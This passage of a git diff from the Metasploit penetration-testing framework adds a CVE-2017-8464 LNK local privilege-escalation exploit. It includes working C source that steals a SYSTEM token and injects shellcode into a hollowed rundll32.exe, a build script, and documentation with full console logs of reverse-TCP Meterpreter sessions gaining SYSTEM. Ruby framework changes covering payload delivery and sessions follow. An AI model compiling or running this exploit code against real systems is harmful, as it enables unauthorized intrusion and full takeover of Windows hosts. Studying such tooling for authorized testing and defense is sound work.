192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37! + [*] 192.168.1.10:13003 - Crafting Exploit... + [*] 192.168.1.10:13003 - Exploit ready for sending... + [*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to + [*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200 + [*] 192.168.1.10:13003 - Closing socket. + meterpreter > getsystem + ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). + meterpreter > getuid Server username: + NT-AUTORITÄT\SYSTEM + meterpreter > +``` + +## Mitigation + +Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities. diff --git a/documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md b/documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md new file mode 100644 index 0000000000..2d04740313 --- /dev/null +++ b/documentation/modules/exploit/windows/local/cve_2017_8464_lnk_lpe.md @@ -0,0 +1,166 @@ +## Description +This module is a Windows local exploit version of the existing file +format module for CVE-2017-8464. The module works by dropping the +specially crafted LNK file and DLL to disk, which causes +`SearchProtocolHost.exe` to parse the LNK file and thus load the DLL via +the vulnerability. Due to `SearchProtocolHost.exe` running as SYSTEM, +this can be used to elevate privileges. + +The original DLL template needed some significant reworking to make it +compatible for execution within `SearchProtocolHost.exe`. The payload +was originally failing in the hollowed child `rundll32.exe` process with +a denied error from winsock. This was addressed by checking if the process +which loaded the crafted DLL is `SearchProtocolHost.exe` and when it is, +it opens the token of another SYSTEM process and passes it to +`CreateProcessAsUser` for the payload to work. When the DLL is loaded +into another process or is not running as SYSTEM, this step is skipped +and `NULL` is passed as the token. + +Finally a thread is spawned to keep a module reference and monitor the +child process. This is for synchronization to prevent the payload from +being executed in rapid succession from a single exploitation attempt. +The mutex was also updated to the constant of `MUTEX!!!` to leverage +Metasploit's builtin mutex name randomization, which ensures that a name +is unique per module run but not globally unique. + +## Vulnerable Systems +Tested and works on +Windows 7x64 SP0 +Windows 7x64 SP1 +Windows 8x64 +Windows 8.1x64 +Windows 10x64 Build 1511 +Windows 10x64 Build 1607 +Windows 10x64 Build 1703 + +## Running Example: +``` +> use exploit/multi/handler +> set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +> set LHOST 192.168.135.112 +LHOST => 192.168.135.112 +> set LPORT 30001 +LPORT => 30001 +> show options + +Module options (exploit/multi/handler): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + + +Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.135.112 yes The listen address + LPORT 30001 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Wildcard Target + + +[*] > Ruby Code (13 bytes) +> run -z +[*] Exploit running as background job 0. +[*] Started reverse TCP handler on 192.168.135.112:30001 +[*] Sending stage (205379 bytes) to 192.168.134.133 +[*] Meterpreter session 1 opened (192.168.135.112:30001 -> 192.168.134.133:49178) at 2017-11-06 10:22:02 -0800 +> sysinfo +Computer : WIN7X64-SP0 +OS : Windows 7 (Build 7600). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 4 +Meterpreter : x64/windows +> sessions -l + +Active sessions +=============== + + Id Type Information Connection + -- ---- ----------- ---------- + 1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133) + +> use exploit/windows/local/cve_2017_8464_lnk_lpe +> set session 1 +session => 1 +> set target 0 +target => 0 +> set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +> set lhost 192.168.135.112 +lhost => 192.168.135.112 +> set lport 30002 +lport => 30002 +> set verbose true +verbose => true +> show options + +Module options (exploit/windows/local/cve_2017_8464_lnk_lpe): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DLLNAME no The DLL file containing the payload + FILENAME no The LNK file + PATH no An explicit path to where the files should be written to + SESSION 1 yes The session to run this module on. + + +Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.135.112 yes The listen address + LPORT 30002 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows x64 + + +> run -j +[*] Exploit running as background job 1. +[*] Started reverse TCP handler on 192.168.135.112:30002 +[*] Generating LNK file to load: C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll +[*] Sending stage (205379 bytes) to 192.168.134.133 +[*] Meterpreter session 2 opened (192.168.135.112:30002 -> 192.168.134.133:49179) at 2017-11-06 10:23:03 -0800 +[*] Waiting 15s before file cleanup... +[+] Deleted C:\Users\msfuser\HADoIQMbEQDpbbRn.lnk +[+] Deleted C:\Users\msfuser\QtGyQHZpWvmzjdsn.dll +> sessions -l + +Active sessions +=============== + + Id Type Information Connection + -- ---- ----------- ---------- + 1 meterpreter x64/windows WIN7X64-SP0\msfuser @ WIN7X64-SP0 192.168.135.112:30001 -> 192.168.134.133:49178 (192.168.134.133) + 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X64-SP0 192.168.135.112:30002 -> 192.168.134.133:49179 (192.168.134.133) + +> getuid +Server username: WIN7X64-SP0\msfuser +Server username: NT AUTHORITY\SYSTEM +> getsystem +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +> getuid +Server username: NT AUTHORITY\SYSTEM +> exit -y +``` + +## Compiling instructions +`cd ./external/source/exploits/cve-2017-8464` +`./build.sh` + +(Requires `mingw-w64` package) diff --git a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md index d422147189..467f8c3603 100644 --- a/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md +++ b/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md @@ -4,7 +4,7 @@ via its SMTP server validation. The module sends a malicious response along in the 220 service ready response and exploits the client, resulting in an unprivileged shell. - he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe). + The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe). ## Verification Steps diff --git a/external/source/exploits/cve-2017-8464/build.sh b/external/source/exploits/cve-2017-8464/build.sh new file mode 100755 index 0000000000..c5eb5e5211 --- /dev/null +++ b/external/source/exploits/cve-2017-8464/build.sh @@ -0,0 +1,17 @@ +#!/bin/sh +rm -f *.o *.dll + +CCx86="i686-w64-mingw32" +CCx64="x86_64-w64-mingw32" + +${CCx64}-gcc -m64 -c -Os template.c -Wall -shared +${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll +${CCx64}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll +rm -f temp.dll *.o +chmod -x ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll + +${CCx86}-gcc -c -Os template.c -Wall -shared +${CCx86}-dllwrap --def template.def *.o -o temp.dll +${CCx86}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll +rm -f temp.dll *.o +chmod -x ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll diff --git a/external/source/exploits/cve-2017-8464/template.c b/external/source/exploits/cve-2017-8464/template.c new file mode 100644 index 0000000000..d995037b69 --- /dev/null +++ b/external/source/exploits/cve-2017-8464/template.c @@ -0,0 +1,241 @@ +#include +#include +#include +#include +#include + +#include "template.h" + +void ExecutePayload(HANDLE hDll); + +BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + switch (dwReason) { + case DLL_PROCESS_ATTACH: + ExecutePayload(hDll); + break; + + case DLL_PROCESS_DETACH: + break; + + case DLL_THREAD_ATTACH: + break; + + case DLL_THREAD_DETACH: + break; + } + return TRUE; +} + +BOOL StringEndsWithStringA(LPCSTR szStr, LPCSTR szSuffix, BOOL bCaseSensitive) { + int result; + + if (strlen(szStr) < strlen(szSuffix)) { + return FALSE; + } + if (bCaseSensitive) { + result = strcmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + else { + result = _stricmp((szStr + strlen(szStr) - strlen(szSuffix)), szSuffix); + } + return result == 0; +} + +BOOL GetProcessSid(HANDLE hProc, PSID *pSid) { + HANDLE hToken; + DWORD dwLength = 0; + TOKEN_USER *tuUser = NULL; + SIZE_T szSid = 0; + + *pSid = NULL; + if (!OpenProcessToken(hProc, (TOKEN_READ), &hToken)) { + return FALSE; + } + + GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength); + tuUser = (TOKEN_USER *)malloc(dwLength); + if (!tuUser) { + return FALSE; + } + + if (!GetTokenInformation(hToken, TokenUser, tuUser, dwLength, &dwLength)) { + free(tuUser); + return FALSE; + } + + szSid = GetLengthSid(tuUser->User.Sid); + *pSid = LocalAlloc(LPTR, szSid); + if ((*pSid) && (!CopySid((DWORD)szSid, *pSid, tuUser->User.Sid))) { + LocalFree(*pSid); + *pSid = NULL; + } + + free(tuUser); + CloseHandle(hToken); + return *pSid != NULL; +} + +BOOL IsProcessRunningAsSidString(HANDLE hProc, LPCTSTR sStringSid, PBOOL pbResult) { + PSID pTestSid = NULL; + PSID pTargetSid = NULL; + + if (!ConvertStringSidToSid(sStringSid, &pTargetSid)) { + return FALSE; + } + + if (!GetProcessSid(hProc, &pTestSid)) { + LocalFree(pTargetSid); + return FALSE; + } + + *pbResult = EqualSid(pTestSid, pTargetSid); + LocalFree(pTargetSid); + LocalFree(pTestSid); + return TRUE; +} + +DWORD FindProcessId(LPCTSTR szProcessName) { + HANDLE hProcessSnap; + PROCESSENTRY32 pe32; + DWORD result = 0; + + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hProcessSnap == INVALID_HANDLE_VALUE) { + return 0; + } + + pe32.dwSize = sizeof(PROCESSENTRY32); + if (!Process32First(hProcessSnap, &pe32)) { + CloseHandle(hProcessSnap); + return 0; + } + + do { + if (!strcmp(szProcessName, pe32.szExeFile)) { + result = pe32.th32ProcessID; + break; + } + } while (Process32Next(hProcessSnap, &pe32)); + CloseHandle(hProcessSnap); + return result; +} + +HANDLE GetPayloadToken(void) { + HANDLE hTokenHandle = NULL; + HANDLE hProcessHandle = NULL; + BOOL bIsSystem = FALSE; + DWORD dwPid = 0; + CHAR Path[MAX_PATH + 1]; + + ZeroMemory(Path, sizeof(Path)); + GetModuleFileNameA(NULL, Path, MAX_PATH); + if (!StringEndsWithStringA(Path, "\\SearchProtocolHost.exe", TRUE)) { + return NULL; + } + /* loaded into the context of SearchProtocolHost.exe */ + + if (IsProcessRunningAsSystem(GetCurrentProcess(), &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* and running as NT_AUTHORITY SYSTEM */ + + dwPid = FindProcessId("spoolsv.exe"); + if (!dwPid) { + return NULL; + } + + hProcessHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); + if (!hProcessHandle) { + return NULL; + } + + bIsSystem = FALSE; + if (IsProcessRunningAsSystem(hProcessHandle, &bIsSystem) && (!bIsSystem)) { + return NULL; + } + /* spoolsv.exe is also running as NT_AUTHORITY SYSTEM */ + + OpenProcessToken(hProcessHandle, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY, &hTokenHandle); + CloseHandle(hProcessHandle); + return hTokenHandle; +} + +DWORD WINAPI MonitorPayloadProcess(PEXPLOIT_DATA pExploitData) { + /* wait for the process to exit or 10 seconds before cleaning up */ + WaitForSingleObject(pExploitData->hProcess, 10000); + CloseHandle(pExploitData->hProcess); + CloseHandle(pExploitData->hMutex); + + /* this does not return */ + FreeLibraryAndExitThread(pExploitData->hModule, 0); + return 0; +} + +void ExecutePayload(HANDLE hDll) { + PROCESS_INFORMATION pi; + STARTUPINFO si; + CONTEXT ctx; + LPVOID ep; + SECURITY_ATTRIBUTES MutexAttributes; + SIZE_T dwBytesWritten = 0; + PEXPLOIT_DATA pExploitData = NULL; + HANDLE hToken; + + pExploitData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(EXPLOIT_DATA)); + if (!pExploitData) { + return; + } + + /* keep a reference to the module for synchronization purposes */ + GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, hDll, (HINSTANCE *)&(pExploitData->hModule)); + + ZeroMemory(&MutexAttributes, sizeof(MutexAttributes)); + MutexAttributes.nLength = sizeof(MutexAttributes); + MutexAttributes.bInheritHandle = TRUE; // inherit the handle + pExploitData->hMutex = CreateMutex(&MutexAttributes, TRUE, "MUTEX!!!"); + if (!pExploitData->hMutex) { + return; + } + + if (GetLastError() == ERROR_ALREADY_EXISTS) { + CloseHandle(pExploitData->hMutex); + return; + } + + if (GetLastError() == ERROR_ACCESS_DENIED) { + CloseHandle(pExploitData->hMutex); + return; + } + + hToken = GetPayloadToken(); + + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + /* start up the payload in a new process */ + if (CreateProcessAsUser(hToken, NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { + ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL; + GetThreadContext(pi.hThread, &ctx); + ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, &dwBytesWritten); + if (dwBytesWritten == SCSIZE) { + +#ifdef _WIN64 + ctx.Rip = (DWORD64)ep; +#else + ctx.Eip = (DWORD)ep; +#endif + + SetThreadContext(pi.hThread, &ctx); + ResumeThread(pi.hThread); + + CloseHandle(pi.hThread); + pExploitData->hProcess = pi.hProcess; + } + } + + if (hToken) { + CloseHandle(hToken); + } + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorPayloadProcess, pExploitData, 0, NULL); +} diff --git a/data/exploits/cve-2017-8464/src/template.def b/external/source/exploits/cve-2017-8464/template.def similarity index 100% rename from data/exploits/cve-2017-8464/src/template.def rename to external/source/exploits/cve-2017-8464/template.def diff --git a/external/source/exploits/cve-2017-8464/template.h b/external/source/exploits/cve-2017-8464/template.h new file mode 100644 index 0000000000..7181e46cba --- /dev/null +++ b/external/source/exploits/cve-2017-8464/template.h @@ -0,0 +1,11 @@ +#define SCSIZE 2048 +unsigned char code[SCSIZE] = "PAYLOAD:"; + +typedef struct { + HANDLE hModule; + HANDLE hMutex; + HANDLE hProcess; +} EXPLOIT_DATA, *PEXPLOIT_DATA; + +#define SIDSTR_SYSTEM _T("s-1-5-18") +#define IsProcessRunningAsSystem(hProc, bResult) IsProcessRunningAsSidString(hProc, SIDSTR_SYSTEM, bResult) diff --git a/data/exploits/cve-2017-8464/src/template.rc b/external/source/exploits/cve-2017-8464/template.rc similarity index 100% rename from data/exploits/cve-2017-8464/src/template.rc rename to external/source/exploits/cve-2017-8464/template.rc diff --git a/lib/metasploit/framework/mssql/client.rb b/lib/metasploit/framework/mssql/client.rb index 4c79a8eb0e..294fbbae2b 100644 --- a/lib/metasploit/framework/mssql/client.rb +++ b/lib/metasploit/framework/mssql/client.rb @@ -634,8 +634,8 @@ module Metasploit if idx > 0 encryption_mode = resp[idx, 1].unpack("C")[0] else - raise RunTimeError, "Unable to parse encryption req. "\ - "from server during prelogin" + framework_module.print_error("Unable to parse encryption req " \ + "during pre-login, this may not be a MSSQL server") encryption_mode = ENCRYPT_NOT_SUP end @@ -682,8 +682,9 @@ module Metasploit if idx > 0 encryption_mode = resp[idx, 1].unpack("C")[0] else - raise RuntimeError, "Unable to parse encryption "\ - "req during pre-login" + framework_module.print_error("Unable to parse encryption req " \ + "during pre-login, this may not be a MSSQL server") + encryption_mode = ENCRYPT_NOT_SUP end end encryption_mode diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index c111856d17..22c37e115b 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.13" + VERSION = "4.16.23" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 1c170f8ce6..27fc80f110 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -634,7 +634,6 @@ class ReadableText sess_via = session.via_exploit.to_s sess_type = session.type.to_s sess_uuid = session.payload_uuid.to_s - sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore sess_enc = false if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key] @@ -652,10 +651,10 @@ class ReadableText sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s ago @ #{session.last_checkin.to_s}" end - if session.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid]) + if session.payload_uuid.registered sess_registration = "Yes" - if uuid_info['name'] - sess_registration << " - Name=\"#{uuid_info['name']}\"" + if session.payload_uuid.name + sess_registration << " - Name=\"#{session.payload_uuid.name}\"" end end diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 110e1fef3d..3e13987fb1 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -147,9 +147,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') session.core.set_session_guid(guid) session.session_guid = guid - # TODO: New statgeless session, do some account in the DB so we can track it later. + # TODO: New stageless session, do some account in the DB so we can track it later. else - # TODO: This session was either staged or previously known, and so we shold do some accounting here! + # TODO: This session was either staged or previously known, and so we should do some accounting here! end unless datastore['AutoLoadStdapi'] == false diff --git a/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb new file mode 100644 index 0000000000..85f1b69b3b --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_ppce500v2_Linux < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'linux' + self.base_arch = ARCH_PPCE500V2 + end +end + +end +end + diff --git a/lib/msf/base/sessions/mettle_config.rb b/lib/msf/base/sessions/mettle_config.rb index f135818614..369562a9c1 100644 --- a/lib/msf/base/sessions/mettle_config.rb +++ b/lib/msf/base/sessions/mettle_config.rb @@ -27,6 +27,10 @@ module Msf generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid]) end + def generate_uri_option(opts, opt) + opts[opt] ? "--#{opt} '#{opts[opt].gsub(/'/, "\\'")}' " : '' + end + def generate_http_uri(opts) if Rex::Socket.is_ipv6?(opts[:lhost]) target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" @@ -38,7 +42,15 @@ module Msf target_uri << opts[:lport].to_s target_uri << luri target_uri << generate_uri(opts) - target_uri + target_uri << '|' + target_uri << generate_uri_option(opts, :ua) + target_uri << generate_uri_option(opts, :host) + target_uri << generate_uri_option(opts, :referer) + if opts[:cookie] + opts[:header] = "Cookie: #{opts[:cookie]}" + target_uri << generate_uri_option(opts, :header) + end + target_uri.strip end def generate_tcp_uri(opts) @@ -57,14 +69,11 @@ module Msf case opts[:scheme] when 'http' - transport = transport_config_reverse_http(opts) - opts[:uri] = generate_http_uri(transport) + opts[:uri] = generate_http_uri(transport_config_reverse_http(opts)) when 'https' - transport = transport_config_reverse_https(opts) - opts[:uri] = generate_http_uri(transport) + opts[:uri] = generate_http_uri(transport_config_reverse_https(opts)) when 'tcp' - transport = transport_config_reverse_tcp(opts) - opts[:uri] = generate_tcp_uri(transport) + opts[:uri] = generate_tcp_uri(transport_config_reverse_tcp(opts)) else raise ArgumentError, "Unknown scheme: #{opts[:scheme]}" end @@ -74,7 +83,7 @@ module Msf unless opts[:stageless] == true guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') end - opts[:session_guid] = Base64.encode64(guid) + opts[:session_guid] = Base64.encode64(guid).strip opts.slice(:uuid, :session_guid, :uri, :debug, :log_file) end diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb index d136f9a396..87a44c031f 100644 --- a/lib/msf/base/sessions/scriptable.rb +++ b/lib/msf/base/sessions/scriptable.rb @@ -27,7 +27,7 @@ module Scriptable # Scan all of the path combinations check_paths.each { |path| - if ::File.exist?(path) + if ::File.file?(path) full_path = path break end @@ -150,7 +150,7 @@ module Scriptable # session local_exploit_opts = local_exploit_opts.merge(opts) - new_session = mod.exploit_simple( + mod.exploit_simple( 'Payload' => local_exploit_opts.delete('payload'), 'Target' => local_exploit_opts.delete('target'), 'LocalInput' => self.user_input, diff --git a/lib/msf/core.rb b/lib/msf/core.rb index 881836e7f9..6eca2772ce 100644 --- a/lib/msf/core.rb +++ b/lib/msf/core.rb @@ -10,8 +10,7 @@ # ### -# Sanity check this version of ruby -require 'msf/sanity' +# Include backported features for older versions of Ruby require 'backports' # The framework-core depends on Rex diff --git a/lib/msf/core/author.rb b/lib/msf/core/author.rb index e5ca594bdd..6dab2bee99 100644 --- a/lib/msf/core/author.rb +++ b/lib/msf/core/author.rb @@ -17,6 +17,7 @@ class Msf::Author KNOWN = { 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', 'anonymous' => 'Unknown', + 'aushack' => 'patrick' + 0x40.chr + 'osisecurity.com.au', 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com', 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com', @@ -39,7 +40,6 @@ class Msf::Author 'mubix' => 'mubix' + 0x40.chr + 'hak5.org', 'natron' => 'natron' + 0x40.chr + 'metasploit.com', 'optyx' => 'optyx' + 0x40.chr + 'no$email.com', - 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au', 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com', 'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com', 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com', diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb index a966c8b1f1..da69eccd6c 100644 --- a/lib/msf/core/auxiliary/nmap.rb +++ b/lib/msf/core/auxiliary/nmap.rb @@ -43,7 +43,7 @@ def rport end def set_nmap_cmd - self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary") + self.nmap_bin || (raise "Cannot locate nmap binary") nmap_set_log nmap_add_ports nmap_cmd = [self.nmap_bin] @@ -54,7 +54,7 @@ def set_nmap_cmd end def get_nmap_ver - self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary") + self.nmap_bin || (raise "Cannot locate nmap binary") res = "" nmap_cmd = [self.nmap_bin] nmap_cmd << "--version" @@ -84,7 +84,7 @@ def nmap_version_at_least?(test_ver=nil) end def nmap_build_args - raise RuntimeError, "nmap_build_args() not defined by #{self.refname}" + raise "nmap_build_args() not defined by #{self.refname}" end def nmap_run @@ -159,13 +159,13 @@ end # A helper to add in rport or rports as a -p argument def nmap_add_ports if not nmap_validate_rports - raise RuntimeError, "Cannot continue without a valid port list." + raise "Cannot continue without a valid port list." end port_arg = "-p \"#{datastore['RPORT'] || rports}\"" if nmap_validate_arg(port_arg) self.nmap_args << port_arg else - raise RunTimeError, "Argument is invalid" + raise "Argument is invalid" end end @@ -237,7 +237,7 @@ end # module to ferret out whatever's interesting in this host # object. def nmap_hosts(&block) - @nmap_bin || (raise RuntimeError, "Cannot locate the nmap binary.") + @nmap_bin || (raise "Cannot locate the nmap binary.") fh = self.nmap_log[0] nmap_data = fh.read(fh.stat.size) # fh.unlink diff --git a/lib/msf/core/db_manager/report.rb b/lib/msf/core/db_manager/report.rb index cb4ccb19ce..45eada1df0 100644 --- a/lib/msf/core/db_manager/report.rb +++ b/lib/msf/core/db_manager/report.rb @@ -44,7 +44,7 @@ module Msf::DBManager::Report unless artifact.valid? errors = artifact.errors.full_messages.join('; ') - raise RuntimeError "Artifact to be imported is not valid: #{errors}" + raise "Artifact to be imported is not valid: #{errors}" end artifact.save end @@ -66,7 +66,7 @@ module Msf::DBManager::Report unless report.valid? errors = report.errors.full_messages.join('; ') - raise RuntimeError "Report to be imported is not valid: #{errors}" + raise "Report to be imported is not valid: #{errors}" end report.state = :complete # Presume complete since it was exported report.save @@ -83,4 +83,4 @@ module Msf::DBManager::Report wspace.reports } end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index 11c29a5c32..59e77b92f2 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -137,6 +137,8 @@ module Exploit::CmdStager raise ArgumentError, 'The command stager could not be generated' end + vprint_status("Generated command stager: #{cmd_list.join}") + cmd_list end diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index daa6ac6f83..a7194c8bb1 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -474,7 +474,13 @@ module Exploit::Remote::HttpClient uri = normalize_uri(custom_uri || target_uri.to_s) - "#{uri_scheme}://#{rhost}#{uri_port}#{uri}" + if Rex::Socket.is_ipv6?(rhost) + uri_host = "[#{rhost}]" + else + uri_host = rhost + end + + "#{uri_scheme}://#{uri_host}#{uri_port}#{uri}" end # diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index eac730b97d..3686faa8cd 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -14,9 +14,11 @@ module Exploit::Powershell OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]), OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]), OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]), + OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]), + OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), - OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]), + OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', true]), OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]), OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]]) ] @@ -215,14 +217,13 @@ module Exploit::Powershell # powershell script # @option opts [Boolean] :remove_comspec Removes the %COMSPEC% # environment variable at the start of the command line - # @option opts [Boolean] :use_single_quotes Wraps the -Command - # argument in single quotes unless :encode_final_payload + # @option opts [Boolean] :wrap_double_quotes Wraps the -Command + # argument in double quotes unless :encode_final_payload # # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) - options.validate(datastore) - - %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload use_single_quotes no_equals method].map do |opt| + %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload + remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 36c03bca7c..f91f3f5a09 100755 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -111,7 +111,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") @@ -126,7 +126,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 70b60081e0..24d882aad1 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -222,7 +222,16 @@ protected s.set_from_exploit(assoc_exploit) # Pass along any associated payload uuid if specified - s.payload_uuid = opts[:payload_uuid] if opts[:payload_uuid] + if opts[:payload_uuid] + s.payload_uuid = opts[:payload_uuid] + if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[s.payload_uuid.puid_hex]) + s.payload_uuid.registered = true + s.payload_uuid.name = uuid_info['name'] + s.payload_uuid.timestamp = uuid_info['timestamp'] + else + s.payload_uuid.registered = false + end + end # If the session is valid, register it with the framework and # notify any waiters we may have. diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 